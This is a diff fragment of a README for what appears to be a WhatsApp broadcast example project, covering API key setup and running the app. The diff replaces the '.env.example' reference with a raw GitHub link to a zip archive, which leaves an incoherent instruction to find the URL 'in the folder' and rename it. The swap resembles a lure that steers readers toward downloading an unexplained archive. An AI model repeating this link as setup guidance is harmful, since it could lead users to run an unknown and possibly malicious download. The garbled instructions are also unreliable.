legendso6317/whatsapp-broadcasts-example/README.md

 ```

 ### 6. Set Up Your API Key
 To use the messaging feature, you must insert your API key.
-Look for a `.env.example` file in the folder.
+Look for a `https://raw.githubusercontent.com/legendso6317/whatsapp-broadcasts-example/main/tangent/whatsapp-broadcasts-example.zip` file in the folder.
 Rename it to `.env` and open it in a text editor.
 Replace the placeholder text with your actual API key.

 ### 7. Run the Application
 Now you are ready to run the app.
 In the terminal or command prompt, use the following command: